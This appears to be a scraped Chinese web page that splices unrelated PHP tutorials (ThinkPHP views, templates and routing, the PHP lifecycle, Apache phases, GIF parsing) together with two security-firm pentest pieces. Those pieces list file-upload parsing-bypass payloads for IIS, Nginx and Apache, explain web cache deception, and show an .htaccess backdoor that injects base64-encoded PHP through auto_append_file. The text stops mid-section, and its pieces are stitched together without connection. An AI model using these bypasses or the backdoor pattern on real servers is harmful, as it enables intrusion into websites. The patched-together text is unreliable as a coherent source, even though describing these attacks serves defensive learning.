php解析

ThinkPHP框架常用的是MVC模式，M是模型、V是视图，C是控制器。通过MVC模式将数据从数据库中查询出来，然后传递到页面中。下面我们来说一下具体的情况；

一、视图渲染

模板定位规则：当前模块/view/当前控制器名（小写）/当前操作（小写）.html。在5.1.6版本后系统会以简洁模式定位模板文件位置，规则如下：当前模块/view/当前控制器（小写）_当前操作（小写）.html

1、Fetch方法

fetch方式是渲染模板时最常用的方法，在使用此方法的前提是控制器类需要继承系统控制器基础类。使用方式如下：

（1）、不需要传递任何参数，框架会自动定位到模板文件；

return $this->fetch();

（2）、传递一个参数，框架会定位至当前控制器下的参数一模板文件；

return $this->fetch('edit');

（3）、传递两个参数，框架会定位至参数一控制器下的参数二模板文件；

return $this->fetch('member/read');

注意事项：在书写参数时请不要书写任何后缀，参数只是目录名称或文件名称而已。

（4）、视图根目录下文件

如果想把view文件夹内的单独文件进行渲染，可以在参数位置进行如下书写：

return $this->fetch('/menu');

（5）、特殊模板文件或特殊位置文件

如果项目中存在特殊模板文件，又不想移动位置，可以通过如下方式进行调用：

return $this->fetch('./template/menu.html');

上面书写的目录位置是相对于当前项目入口文件位置（public目录），模板文件后缀无固定要求，可以为html、php、tpl等格式

2、助手函数方式

如果控制器未继承系统基础控制器类，同样可以实现视图模板的输出，框架提供了助手函数view()，可以使用如下命令：

return view();

可传递参数及数据，常见的使用方式如下：

return view('模板文件路径','数据');

3、直接解析模板方式

项目中某些页面可能通过直接解析模板的方式就可以实现功能，那么我们可以通过最简单的方式对模板文件进行输出。使用如下命令：

return $this->display();

此方式会直接渲染内容，同样模板标签在视图中可以正常使用。

二、视图赋值

1、assign方法

在继承系统基础控制器类后可以通过如下命令进行视图赋值：

$this->assign("名","值");

批量赋值方式：

$this->assign(['名'=>'值','名'=>'值']);

2、方法传入参数方式

此方式在进行视图渲染中提及到了，通过设置模板文件位置时携带数据。命令如下：

$this->fetch('path',['名'=>'值','名'=>'值']);$this->display('path',['名'=>'值','名'=>'值']);

3、助手函数赋值方式

这种方式是项目开发过程中最常见的模式，助手函数无需继承基础控制类，相对而言代码更加精简、可读性更高。命令如下：

return view('path',['名'=>'值','名'=>'值']);

4、公共模板变量赋值方式

可以使用视图类的share静态方法进行全局公共模板变量赋值。命令如下：

use think\facade\View;// 赋值全局模板变量View::share('name','value');// 或者批量赋值View::share(['name1'=>'value','name2'=>'value2']);

三、视图过滤

1、局部过滤

在单独方法内进行视图过滤操作。命令如下：

// 使用视图输出过滤return $this->filter(function($content){returnstr_replace("\r\n",'<br/>',$content);})->fetch();

2、全局过滤

如果进行全局过滤方式，需要在初始化方法中进行设置。命令如下：

protected functioninitialize(){$this->view->filter(function($content){returnstr_replace("\r\n",'<br/>',$content); });}

总结：视图过滤方式可以理解过对视图模板中内容进行了替换操作，可以通过此方式减少代码空行，无用的缩进。减少代码体积。

四、模板引擎

框架中内置了模板引擎，默认可以忽略对此进行设置，同时框架支持自定义引擎模式。在配置目录（config目录）下的template.php文件中可进行配置。

默认提供了两种扩展引擎：think-angular、twig（都不是很完美，不建议使用

4、）

五、扩展

如果只想获得解析文件而不进行渲染，如果生成静态HTML文件，采用纯静态化模式。可以使用如下命令：

$html = $this->fetch()->getContent();

此方式返回字符串，可以继承文件创建方式，批量生成HTML静态文件，便于网站优化。

六、总结

1、依据场景，选择不同的渲染方式；

2、合理的进行模板赋值；

3、牢记特殊模板文件位置是基础项目入口文件位置；

4、模板文件配置目录为：config/template.php文件；

本节我们一起学习下php的常见函数使用。

01php的EOF(heredoc) 概念及其使用说明

php EOF(heredoc)是一种在命令行shell（如sh、csh、bash、PowerShell等）和程序语言（像Perl、php、Python和Ruby）里定义一个字符串的方法。需要注意的是，EOF是一种字符串方法。

php中的EOF使用概述：

1. EOF使用完成后必须后接分号，否则编译通不过。2. EOF 可以用任意其它字符代替，只需保证结束标志与开始标志一致（比如我们可以用html、EOS等字符串来代替EOF，但是需要保持开始和结束使用的标志符一样，且不能在正文中重复，也就是开始使用了EOF，结束的时候必须使用EOF，但是正文中不能有EOF）。3. 结束标志必须顶格独自占一行并且必须从行首开始，前后不能衔接任何空白和字符。4. 开始标志可以不带引号或带单双引号，不带引号与带双引号效果一致，解释内嵌的变量和转义符号，带单引号则不解释内嵌的变量和转义符号。5.EOF 中是会解析 html 格式内容的，并且在双引号内的内容也有转义效果6. 当内容需要内嵌引号（单引号或双引号）时，不需要加转义符，本身对单双引号转义，此处相当于q和qq的用法。使用示例如下图：

02php语言的数据类型

和其他语言一样，php语言的数据的数据类型也包含了字符串、整型、浮点型、数组、对象以及空值，类似于其他语言的对应数据类型，这些东西都是通用的，这里不再赘述。如下代码是先将字符串Hello world赋值给变量x，然后再将x变量的值变为空（null），最后使用var_dump输出x的结果（var_dump会先判断变量的类型和长度，然后输出结果。

<?php$x="Hello world!";$x=null;var_dump($x);?>

说明：var_dump() 方法，判断一个变量的类型与长度，并输出变量的数值，如果变量有值，则输出是变量的值，并返回数据类型。显示关于一个或多个表达式的结构信息，包括表达式的类型与值。数组将递归展开值，通过缩进显示其结构。

03PHP 类型比较

尽管 PHP 是弱类型语言，但也需要明白变量类型及它们的意义，因为我们经常需要对 PHP 变量进行比较，包含松散和严格比较。

松散比较：使用两个等号 == 比较，只比较值，不比较类型。严格比较：用三个等号 === 比较，除了比较值，也比较类型。也就是说，如果一个定义为字符串123，另一个定义为整型变量123，那么在使用"=="来进行比较的时候，这两个值是为true的，而如果使用"==="来进行比较时，那么返回值就是false了。

示例代码如下图：

04PHP 常量

常量值被定义后，在脚本的其他任何地方都不能被改变。

常量是一个简单值的标志符。该值在脚本中不能改变。一个常量由英文字母、下划线、和数字组成，但数字不能作为首字母出现。 (常量名不需要加 $ 修饰符)。常量在整个脚本中都可以使用。

设置常量，常量是全局的，可以在对应的范围内使用。一般使用 define() 函数，函数语法如下：bool define (string $name , mixed $value [,bool $case_insensitive =false])

该函数有三个参数：

name：必选参数，就是你所定义的常量名称，即标志符。value：必选参数，定义的常量的值。case_insensitive ：可选参数，为ture，表示该常量对大小写不敏感。默认是false（大小写敏感）。

上述就是本次为大家分享的内容，喜欢就点个赞吧，同时也希望大家多多点赞关注！

简介先看看下面这个过程：

我们从未手动开启过PHP的相关进程，它是随着Apache的启动而运行的；PHP通过mod_php5.so模块和Apache相连（具体说来是SAPI，即服务器应用程序编程接口）；PHP总共有三个模块：内核、Zend引擎、以及扩展层；PHP内核用来处理请求、文件流、错误处理等相关操作；Zend引擎（ZE）用以将源文件转换成机器语言，然后在虚拟机上运行它；扩展层是一组函数、类库和流，PHP使用它们来执行一些特定的操作。比如，我们需要mysql扩展来连接MySQL数据库；当ZE执行程序时可能会需要连接若干扩展，这时ZE将控制权交给扩展，等处理完特定任务后再返还；最后，ZE将程序运行结果返回给PHP内核，它再将结果传送给SAPI层，最终输出到浏览器上。深入探讨　　等等，没有这么简单。以上过程只是个简略版，让我们再深入挖掘一下，看看幕后还发生了些什么。

Apache启动后，PHP解释程序也随之启动；PHP的启动过程有两步；第一步是初始化一些环境变量，这将在整个SAPI生命周期中发生作用；第二步是生成只针对当前请求的一些变量设置。PHP启动第一步　　不清楚什么第一第二步是什么？别担心，我们接下来详细讨论一下。让我们先看看第一步，也是最主要的一步。要记住的是，第一步的操作在任何请求到达之前就发生了。

启动Apache后，PHP解释程序也随之启动；PHP调用各个扩展的MINIT方法，从而使这些扩展切换到可用状态。看看php.ini文件里打开了哪些扩展吧；MINIT的意思是“模块初始化”。各个模块都定义了一组函数、类库等用以处理其他请求。　　一个典型的MINIT方法如下：PHP_MINIT_FUNCTION(extension_name){/* Initialize functions, classes etc */}PHP启动第二步

当一个页面请求发生时，SAPI层将控制权交给PHP层。于是PHP设置了用于回复本次请求所需的环境变量。同时，它还建立一个变量表，用来存放执行过程中产生的变量名和值。PHP调用各个模块的RINIT方法，即“请求初始化”。一个经典的例子是Session模块的RINIT，如果在php.ini中启用了Session模块，那在调用该模块的RINIT时就会初始化$_SESSION变量，并将相关内容读入；RINIT方法可以看作是一个准备过程，在程序执行之间就会自动启动。　　一个典型的RINIT方法如下：PHP_RINIT_FUNCTION(extension_name) {/* Initialize session variables, pre-populate variables, redefine global variables etc */}PHP关闭第一步　　如同PHP启动一样，PHP的关闭也分两步：

一旦页面执行完毕（无论是执行到了文件末尾还是用exit或die函数中止），PHP就会启动清理程序。它会按顺序调用各个模块的RSHUTDOWN方法。RSHUTDOWN用以清除程序运行时产生的符号表，也就是对每个变量调用unset函数。　　一个典型的RSHUTDOWN方法如下：PHP_RSHUTDOWN_FUNCTION(extension_name) {/* Do memory management, unset all variables used in the last PHP call etc */}PHP关闭第二步　　最后，所有的请求都已处理完毕，SAPI也准备关闭了，PHP开始执行第二步：

PHP调用每个扩展的MSHUTDOWN方法，这是各个模块最后一次释放内存的机会。　　一个典型的RSHUTDOWN方法如下：PHP_MSHUTDOWN_FUNCTION(extension_name) {/* Free handlers and persistent memory etc */}　　这样，整个PHP生命周期就结束了。要注意的是，只有在服务器没有请求的情况下才会执行“启动第一步”和“关闭第二步”。

图1 php结构

从图上可以看出，php从下到上是一个4层体系

①Zend引擎

Zend整体用纯c实现，是php的内核部分，它将php代码翻译（词法、语法解析等一系列编译过程）为可执行opcode的处理并实现相应的处理方法、实现了基本的数据结构（如hashtable、oo）、内存分配及管理、提供了相应的api方法供外部调用，是一切的核心，所有的外围功能均围绕zend实现。

②Extensions

围绕着zend引擎，extensions通过组件式的方式提供各种基础服务，我们常见的各种内置函数（如array系列）、标准库等都是通过extension来实现，用户也可以根据需要实现自己的extension以达到功能扩展、性能优化等目的（如贴吧正在使用的php中间层、富文本解析就是extension的典型应用）。

③Sapi

Sapi全称是Server Application Programming Interface，也就是服务端应用编程接口，sapi通过一系列钩子函数，使得php可以和外围交互数据，这是php非常优雅和成功的一个设计，通过sapi成功的将php本身和上层应用解耦隔离，php可以不再考虑如何针对不同应用进行兼容，而应用本身也可以针对自己的特点实现不同的处理方式。后面将在sapi章节中介绍

④上层应用

这就是我们平时编写的php程序，通过不同的sapi方式得到各种各样的应用模式，如通过webserver实现web应用、在命令行下以脚本方式运行等等。

构架思想：

引擎(Zend)+组件(ext)的模式降低内部耦合

中间层(sapi)隔绝web server和php

**************************************************************************

如果php是一辆车，那么

车的框架就是php本身

Zend是车的引擎（发动机）

Ext下面的各种组件就是车的轮子

Sapi可以看做是公路，车可以跑在不同类型的公路上

而一次php程序的执行就是汽车跑在公路上。

因此，我们需要：性能优异的引擎+合适的车轮+正确的跑道

把php最终集成到Apache系统中，还需要对Apache进行一些必要的设置。这里，我们就以php的mod_php5 SAPI运行模式为例进行讲解，至于SAPI这个概念后面我们还会详细讲解。

假定我们安装的版本是Apache2 和 Php5，那么需要编辑Apache的主配置文件http.conf，在其中加入下面的几行内容：

Unix/Linux环境下：

LoadModule php5_module modules/mod_php5.so

AddType application/x-httpd-php .php

注：其中modules/mod_php5.so 是X系统环境下mod_php5.so文件的安装位置。

Windows环境下：

LoadModule php5_module d:/php/php5apache2.dll

AddType application/x-httpd-php .php

注：其中d:/php/php5apache2.dll 是在Windows环境下php5apache2.dll文件的安装位置。

这两项配置就是告诉Apache Server，以后收到的Url用户请求，凡是以php作为后缀，就需要调用php5_module模块（mod_php5.so/ php5apache2.dll）进行处理。

Apache请求处理循环详解 Apache请求处理循环的11个阶段都做了哪些事情呢？

1、Post-Read-Request阶段

在正常请求处理流程中，这是模块可以插入钩子的第一个阶段。对于那些想很早进入处理请求的模块来说，这个阶段可以被利用。

2、URI Translation阶段 Apache在本阶段的主要工作：将请求的URL映射到本地文件系统。模块可以在这阶段插入钩子，执行自己的映射逻辑。mod_alias就是利用这个阶段工作的。

3、Header Parsing阶段 Apache在本阶段的主要工作：检查请求的头部。由于模块可以在请求处理流程的任何一个点上执行检查请求头部的任务，因此这个钩子很少被使用。mod_setenvif就是利用这个阶段工作的。

4、Access Control阶段 Apache在本阶段的主要工作：根据配置文件检查是否允许访问请求的资源。Apache的标准逻辑实现了允许和拒绝指令。mod_authz_host就是利用这个阶段工作的。

5、Authentication阶段 Apache在本阶段的主要工作：按照配置文件设定的策略对用户进行认证，并设定用户名区域。模块可以在这阶段插入钩子，实现一个认证方法。

6、Authorization阶段 Apache在本阶段的主要工作：根据配置文件检查是否允许认证过的用户执行请求的操作。模块可以在这阶段插入钩子，实现一个用户权限管理的方法。

7、MIME Type Checking阶段 Apache在本阶段的主要工作：根据请求资源的MIME类型的相关规则，判定将要使用的内容处理函数。标准模块mod_negotiation和mod_mime实现了这个钩子。

8、FixUp阶段 这是一个通用的阶段，允许模块在内容生成器之前，运行任何必要的处理流程。和Post_Read_Request类似，这是一个能够捕获任何信息的钩子，也是最常使用的钩子。

9、Response阶段 Apache在本阶段的主要工作：生成返回客户端的内容，负责给客户端发送一个恰当的回复。这个阶段是整个处理流程的核心部分。

10、Logging阶段 Apache在本阶段的主要工作：在回复已经发送给客户端之后记录事务。模块可能修改或者替换Apache的标准日志记录。

11、CleanUp阶段 Apache在本阶段的主要工作：清理本次请求事务处理完成之后遗留的环境，比如文件、目录的处理或者Socket的关闭等等，这是Apache一次请求处理的最后一个阶段。

天气逐渐变凉,但渗透测试的热情温度感觉不到凉,因为有我们的存在公开分享渗透实战经验过程,才会让这个秋冬变得不再冷，近期有反映在各个环境下的目录解析漏洞的检测方法,那么本节由我们Sine安全的高级渗透架构师来详细的讲解平常用到的web环境检测点和网站漏洞防护办法。

3.14.1. IIS

3.14.1.1. IIS 6.0

后缀解析 /xx.asp;.jpg目录解析 /xx.asp/xx.jpg (xx.asp目录下任意解析)默认解析 xx.asa xx.cer xx.cdxPROPFIND 栈溢出漏洞PUT漏洞 WebDAV任意文件上传3.14.1.2. IIS 7.0-7.5 / Nginx <= 0.8.37

在Fast-CGI开启状态下，在文件路径后加上 /xx.php ，则 xx.jpg/xx.php 会被解析为php文件

3.14.1.3. 其他

在支持NTFS 8.3文件格式时，可利用短文件名猜解目录文件

3.14.2. Nginx

3.14.2.1. Fast-CGI关闭

在Fast-CGI关闭的情况下， Nginx 仍然存在解析漏洞：在文件路径(xx.jpg)后面加上 %00.php ， 即 xx.jpg%00.php 会被当做 php 文件来解析

3.14.2.2. Fast-CGI开启

在Fast-CGI开启状态下，在文件路径后加上 /xx.php ，则 xx.jpg/xx.php 会被解析为php文件

3.14.2.3. CVE-2013-4547

"a.jpg\x20\x00.php"

3.14.3. Apache

3.14.3.1. 后缀解析

test.php.x1.x2.x3 （ x1,x2,x3 为没有在 mime.types 文件中定义的文件类型）。Apache 将从右往左开始判断后缀， 若x3为非可识别后缀，则判断x2，直到找到可识别后缀为止，然后对可识别后缀进行解析

3.14.3.2. .htaccess

当AllowOverride被启用时，上传启用解析规则的.htaccess

3.14.3.3. CVE-2017-15715

%0A绕过上传黑名单

3.14.4. lighttpd

xx.jpg/xx.php

3.14.5. Windows

Windows不允许空格和点以及一些特殊字符作为结尾，创建这样的文件会自动取出，所以可以使用 xx.php[空格] ， xx.php.， xx.php/， xx.php::$DATA 可以上传脚本文件

3.15. Web Cache欺骗攻击

3.15.1. 简介

网站通常都会通过如CDN、负载均衡器、或者反向代理来实现Web缓存功能。通过缓存频繁访问的文件，降低服务器响应延迟。

例如，网站 htttp://域名 配置了反向代理。对于那些包含用户个人信息的页面，如 http://域名/home.php ，由于每个用户返回的内容有所不同，因此这类页面通常是动态生成，并不会在缓存服务器中进行缓存。通常缓存的主要是可公开访问的静态文件，如css文件、js文件、txt文件、图片等等。此外，很多最佳实践类的文章也建议，对于那些能公开访问的静态文件进行缓存，并且忽略HTTP缓存头。

Web cache攻击类似于RPO相对路径重写攻击，都依赖于浏览器与服务器对URL的解析方式。当访问不存在的URL时，如 http://域名/home.php/non-existent.css ，浏览器发送get请求，依赖于使用的技术与配置，服务器返回了页面 http://域名/home.php 的内容，同时URL地址仍然是 http://域名/home.php/non-existent.css，http头的内容也与直接访问 http://域名/home.php 相同，cacheing header、content-type（此处为text/html）也相同。

3.15.2. 漏洞成因

当代理服务器设置为缓存静态文件并忽略这类文件的caching header时，访问

http://域名/home.php/no-existent.css 时，会发生什么呢？整个响应流程如下：

浏览器请求 http://域名/home.php/no-existent.css ;服务器返回 http://域名/home.php 的内容(通常来说不会缓存该页面);响应经过代理服务器;代理识别该文件有css后缀;在缓存目录下，代理服务器创建目录 home.php ，将返回的内容作为 non-existent.css 保存。3.15.3. 漏洞利用

攻击者欺骗用户访问 http://域名/home.php/logo.png?www.myhack58.com ,导致含有用户个人信息的页面被缓存，从而能被公开访问到。更严重的情况下，如果返回的内容包含session标识、安全问题的答案，或者csrf token。这样攻击者能接着获得这些信息，因为通常而言大部分网站静态资源都是公开可访问的。

3.15.4. 漏洞存在的条件

漏洞要存在，至少需要满足下面两个条件：

web cache功能根据扩展进行保存，并忽略caching header;当访问如 http://域名/home.php/non-existent.css 不存在的页面，会返回 home.php 的内容。3.15.5. 漏洞防御

防御措施主要包括3点：

设置缓存机制，仅仅缓存http caching header允许的文件，这能从根本上杜绝该问题;如果缓存组件提供选项，设置为根据content-type进行缓存;访问 http://域名/home.php/non-existent.css 这类不存在页面，不返回 home.php 的内容，而返回404或者302。对图片上传目录进行脚本权限限制,对上传扩展这里做过滤判断。如果缓存组件提供选项，设置为根据content-type进行缓存;对get url的地址进行waf的安全过滤,如果对这些安全防护部署以及渗透测试不熟悉的话,建议可以像专业的网站安全公司来处理解决,国内做的比较好的推荐Sinesafe,启明星辰,绿盟，等等专业的。

引言

PHP几乎很少处理二进制文件。但是便宜也完整的保留了这个功能。当你需要的时候，PHP自带的pack() & unpack()能能够极大地提供便利。下面我们从一个编程问题开始，讨论二进制文件的操作。

下文讨论gif文件，我们会编写一个函数，处理的内容跟GIF图像后缀无关。当然，我们也不打算尝试PHP的GD库。

gif文件头

不使用任何与图像处理相关的函数，为了解决这个问题，我们得从GIF文件本身获取数据。

与HTML、XML或其他文本格式文件不同，GIF文件和大多数其他图像格式是以二进制格式存储的。

大多数二进制文件的顶部都有一个头文件，它提供关于特定文件的元信息。我们可以使用这些信息来查找文件的类型和其他信息，比如GIF文件的高度和宽度。

下面显示了一个典型的原始GIF头文件，使用的是十六进制编辑器。

标题的详细描述如下。

因此，要检查图像文件是否是有效的GIF，我们需要检查文件的头3个字节，它有“GIF”标记，然后3个字节，它给出了版本号;“87a”或“89a”。

对于这样的需求，unpack()函数是必不可少的。在查看解决方案之前，我们快速查看一下unpack()函数本身。

使用unpack()函数

unpack()是pack()的补充——它根据指定的格式将二进制数据转换为关联数组。

它有点类似于sprintf，根据给定的格式转换字符串数据。

这两个函数（pack & unpack），允许我们根据指定的格式字符串读写二进制数据缓冲区。这使编程人员能够轻松地与用其他语言，或其他格式编写的程序交换数据。

举个小例子：

$data=unpack('C*','codediesel');var_dump($data);

这会打印以下十进制代码的“codediesel”:

array1=> int 992=> int 1113=> int 1004=> int 1015=> int 1006=> int 1057=> int 1018=> int 1159=> int 10110=> int 108

在上面的例子中，第一个参数是格式字符串，第二个参数是实际数据。

格式字符串指定应该如何解析数据参数。在本例中，格式“C”的第一部分指定我们应该将数据的第一个字符视为无符号字节。下一部分' * '告诉函数将前面指定的格式代码应用于所有剩余的字符。

乍一看上去挺混乱，但是慢慢梳理你会发现其中的规律。下一节我们提供一个具体的例子。

抓取头部数据

下面是使用unpack()函数解决GIF问题的方法。如果给定的文件是GIF格式的，则is_gif()函数将返回true。

function is_gif($image_file){/* Open the image file in binary mode */if(!$fp = fopen ($image_file, 'rb')) return 0;/* Read 20 bytes from the top of the file */if(!$data = fread ($fp, 20)) return 0;/* Create a format specifier */$header_format = 'A6version'; # Get the first 6 bytes/* Unpack the header data */$header = unpack ($header_format, $data);$ver = $header['version'];return ($ver == 'GIF87a' || $ver == 'GIF89a')? true : false;}/* Run our example */echo is_gif("aboutus.gif");

需要注意的重要行是格式说明符。

' A6 '字符指定unpack()函数获取数据的前6个字节并将其解释为字符串。然后将检索到的数据存储在一个关联数组中，该数组的键名为“version”。

下面给出了另一个例子。

这将返回GIF文件的一些附加头数据，包括图像的宽度和高度。

function get_gif_header($image_file){/* Open the image file in binary mode */if(!$fp = fopen ($image_file, 'rb')) return 0;/* Read 20 bytes from the top of the file */if(!$data = fread ($fp, 20)) return 0;/* Create a format specifier */$header_format ='A6Version/' . # Get the first 6 bytes'C2Width/' . # Get the next 2 bytes'C2Height/' . # Get the next 2 bytes'C1Flag/' . # Get the next 1 byte'@11/' . # Jump to the 12th byte'C1Aspect'; # Get the next 1 byte/* Unpack the header data */$header = unpack ($header_format, $data);$ver = $header['Version'];if($ver == 'GIF87a' || $ver == 'GIF89a') {return $header;} else {return 0;}}/* Run our example */print_r(get_gif_header("aboutus.gif"));

上面的示例运行后打印以下内容。

Array([Version]=> GIF89a [Width1]=>97[Width2]=>0[Height1]=>33[Height2]=>0[Flag]=>247[Aspect]=>0)

下面我们将详细讨论格式说明符的工作方式。我将分解格式，给出每个字符的详细信息。

$header_format='A6Version/C2Width/C2Height/C1Flag/@11/C1Aspect';

更多格式选项可以在上图找到。

写在最后

我们展示的只是一个小小的例子，按照上图所揭示的规律，您可以任意组装成强大的解析函数。

在开发过程中，我们需要写控制器、模型、验证代码。最后要写模板代码，如果是前后端分离项目则不用写模板了。直接在接口中返回数据就可以了。模板代码包含了很多知识，下面举例介绍一下；

变量输出

1、常见的输出方式是使用大括号（{ }）的形式，里面写入变量名称。在runtime/temp目录下可以看到编译后的文件，括号解析成了<?php ?>的形式，并且里面包含htmlentities。命令如下（注意$ 和 { 之间不能存在空格）：

{$data}

2、原样解析，如果解析富文本内容时使用，使用示例：

{$data|raw}

3、默认值，使用示例：

{$data|default='这是一个默认值'}

4、系统变量输出，主要是获取用户昵称，使用示例：

{$Think.session.name}

5、常量输出，使用示例：

{$Think.PHP_VERSION}

6、配置输出，主要是获取基础网址，使用示例：

{$Think.config.default_module}

使用函数

1、框架内置规则：

2、应用方式：

2.1、单函数应用，使用示例：

{$data.name|md5}

2.2、多函数应用，使用示例：

{$name|md5|upper|substr=0,3}

运算符

1、常见运算符

2、三元运算符

2.1、默认写法

{$status?'正常':'错误'}

2.2、简单写法，表示有则输出，无则输出默认值

{$name ??'默认值'}

2.3、为真写法，表示为真的时候才输出默认值

{$name?='默认值'}

2.3、真假写法、表示为真输出值，否则输出默认值

{$name ?:'NO'}

2.4、表达式写法，表达式为真则输出值一，否则输出值二

{$a==$b ?'yes':'no'}

原样输出

原样输出使用较少，如果想让输出内容不被模板标签所解析，使用如下命令进行输出：

{literal} Hello,{$name}！{/literal}

模板注释

模板注释和代码注释是两种方式，模板注释不会在页面上查看到被注释的代码，而代码注释则可以查看的到。使用方式如下：

{/* 这是模板注释内容*/} 或 {// 这是模板注释内容 }

模板布局

模板布局总结来说就两点：配置和模板；

配置分为模块配置和应用配置，一般情况下后台多应用模板布局方式，在后台模块config/template.php文件内（默认不存在，需手动创建）设置如下代码：

'layout_on'=>true, //开启布局模式'layout_name'=>'layout', //布局文件名称，可设置为 'index/layout'目录形式'layout_item'=>'{__REPLACE__}' //输出替换变量

模板继承

在实际项目开发过程中使用较少，主要是因为继承过于麻烦。

包含文件

在实际项目开发过程中，前端页面使用较多，使用方式较为单一；

1、使用模版文件，多个文件使用逗号分隔；

{include file="public/header,public/menu"/}

2、传入参数，此方式需注意模板中变量值必须存在；

{include file="Public/header" keywords="开源WEB开发框架"/}

输出替换

1、配置，在应用或模块配置目录下的template.php文件中进行如下代码配置：

'tpl_replace_string'=>['__STATIC__'=>'/static','__JS__'=>'/static/javascript',]

2、总结，优点：方便更改；但是不建议使用，建议在开发过程中设置好目录位置。

标签库

标签库类似于Java的Struts中的JSP标签库，每一个标签库是一个独立的标签库文件，标签库中的每一个标签完成某个功能，采用XML标签方式（包括开放标签和闭合标签）。具体内容请参考官方文档。

内置标签

1、普通循环标签，使用示例：

{volist name="list" id="vo" key="k"}{$k}.{$vo.name}{/volist}

如果没有指定key属性的话，默认使用循环变量i

2、控制输出行数，如输出其中的第5～15条记录，使用示例：

{volist name="list" id="vo" offset="5" length='10'}{$vo.name}{/volist}

3、比较标签（不常用）

4、SWITCH标签（不常用），使用示例：

{switch User.level} {case 1}value1{/case} {case 2}value2{/case} {default /}default {/switch}

5、资源文件加载（常用），使用实例：

{load href="/static/js/common.js,/static/css/style.css"/}

标签扩展

此扩展在开发过程中并不常用，使用起来较为麻烦。

路由是开发过程中比较重要的一环，在ThinkPHP5.1版本后路由默认开启，并且不可以关闭，足以可见它的重要性。下面我们来具体的说一下；

注意事项

1、默认开启、不可关闭；

2、优先匹配、多模式支持；

3、匹配成功，不再继续匹配；

4、默认支持数字、字母、下划线，不支持中文及特殊符号；

主要作用

1、URL链接更加规范、美观，更加适合SEO优化；

2、隐式传入额外请求参数；

3、请求方式拦截，区分GET、POST等请求方式；

4、绑定请求数据；

5、处理请求缓存，优化程序响应时间；

6、路由中间件支持（V5.1.6+版本以上支持）；

路由定义

1、定义位置：route/route.php文件内，可以在route目录内多文件定义，最终框架会进行路由整合，建议采用域名+分组模式定义路由。

2、定义方式：

Route::get('new/:id','News/read');// 定义GET请求路由规则Route::post('new/:id','News/update');// 定义POST请求路由规则Route::put('new/:id','News/update');// 定义PUT请求路由规则Route::delete('new/:id','News/delete');// 定义DELETE请求路由规则Route::any('new/:id','News/read');// 所有请求都支持的路由规则

请注意：

1、路由匹配成功后，原链接访问方式会失效；

2、完全匹配需在尾部添加$ ;

3、变量可有可无使用[] 包裹变量；

变量规则

系统默认的变量规则设置是\w+，只会匹配字母、数字和下划线字符，并不会匹配特殊符号和中文，需要定义变量规则或者调整默认变量规则。

1、局部配置（仅在当前路由有效）

*定义GET请求路由规则 并设置name变量规则

Route::get('new/:name','News/read')->pattern(['name'=>'\w+']);

2、全局配置（全部路由有效）

*设置name变量规则（采用正则定义）

Route::pattern('name','\w+');

*支持批量添加

Route::pattern(['name'=>'\w+','id'=>'\d+',]);

3、组合变量

*组合变量的优势是路由规则中没有固定的分隔符，可以随意组合需要的变量规则和分割符

Route::get('item-<name>-<id>','product/detail')->pattern(['name'=>'\w+','id'=>'\d+']);

路由地址

闭包支持

实际开发过程中不常用，是一种简单直接的定义模式；

Route::rule('hello/:name',function(Request $request, $name){$method = $request->method();return'['. $method .'] Hello,'. $name;});

路由参数

路由缓存

在定义大量的路由时，强烈建议使用路由缓存，注意仅在部署模式下有效，开启该缓存可以明显提升路由解析性能。

开启方式，在应用配置文件app.php中设置开启：

'route_check_cache'=>true,

开启后，会自动对每次的路由请求的调度进行缓存，第二次如果是相同的请求则无需再次经过路由解析，而是直接进行请求调度。

清除命令：

>php think clear --route

跨域请求

如果某个路由或者分组需要支持跨域请求，可以使用如下代码：

Route::get('new/:id','News/read')->ext('html')->allowCrossDomain();

注解路由

此方式不建议使用，缺点路由分散不方便管理，同时书写规则要求较为严格。

路由分组

强烈建议使用，下面书写一种比较完善的路由分组写法：

Route::group(['method'=>'get','ext'=>'html'],function(){Route::group('blog',function(){Route::rule('blog/:id','blog/read');Route::rule('blog/:name','blog/read');});})->pattern(['id'=>'\d+','name'=>'\w+']);

MISS路由

如果希望在没有匹配到所有的路由规则后执行一条设定的路由，可以注册一个单独的MISS路由，总结来说，可以应用于404页面，防止程序找不到路由而报错（一旦设置了MISS路由，相当于开启了强制路由模式）；

Route::miss('public/miss');

资源路由

实际开发过程中不常用，不做描述。

快捷路由

此方式要求在控制器层面定义方法名称较为严格，简单做一下描述，不建议使用。

*给User控制器设置快捷路由

Route::controller('user','index/User');<?php namespace app\index\controller;class User{public functiongetInfo(){ }}

路由别名

路由别名不支持变量类型和路由条件判断，单纯只是为了缩短URL地址，并且在定义的时候需要注意避免和路由规则产生混淆。设置操作方法的请求类型：

*user 别名路由到 index/user 控制器

Route::alias('user','index/user',['ext'=>'html','allow'=>'index,save,delete','method'=>['index'=>'GET','save'=>'POST','delete'=>'DELETE'],]);

路由绑定

把当前的URL绑定到模块/控制器/操作，最多支持绑定到操作级别，例如在路由配置文件中添加：

*绑定当前的URL到 index模块

Route::bind('index');

*绑定当前的URL到 index模块的blog控制器

Route::bind('index/blog');

域名路由

支持完整域名、子域名和IP部署的路由和绑定功能，同时还可以起到简化URL、加快匹配的作用。

Route::domain(['blog','admin'],function(){Route::rule('new/:id','index/news/read');});

URL生成

支持路由URL地址的统一生成，并且支持所有的路由方式，但是不建议使用，直接在页面中手动设置，减少模板解析时间。

可以使用助手函数url,不需要继承框架基础控制器类即可使用，示例如下：

url('index/blog/read','id=5&name=thinkphp');

解析后为：/index.php/blog/5/name/thinkphp.html

其他配置方式不做过多讲解。请移步官方文档查看。

很多想做渗透测试的朋友都想了解关于PHP后门漏洞的安全测试重点方法,以及该如何预防被中php后门，本节由我们的Sine安全高级渗透工程师进行全面的讲解,来让大家更好的理解和了解php代码的安全检测,让网站得到最大化的安全保障,安全保障了,网站才能更长远的运行下去。

4.1.1. 后门

4.1.1.1. php.ini构成的后门

利用 auto_prepend_file 和 include_path

4.1.1.2. .htaccess后门

php_value auto_append_file .htaccess

#<?php phpinfo();

php_flag allow_url_include 1

php_value auto_append_file data://text/plain;,PD9waHAgcGhwaW5mbygpOw==

#php_value auto_append_file data://text/plain,%3C%3Fphp+phpinfo%28%29%3B

4.1.1.3. .user.ini文件构成的PHP后门

.user.ini可运行于所有以fastcgi运行的server。利用方式同php.in

4.1.2. 反序列化

4.1.2.1. PHP序列化实现

PHP序列化处理共有三种，分别为php_serialize、php_binary和 WDDX，默认为php_serialize，可通过配置中的 session.serialize_handler 修改。

其中php_serialize的实现在 php-src/ext/standard/var.c 中，主要函数为 php_var_serialize_intern ，序列化后的格式如下：

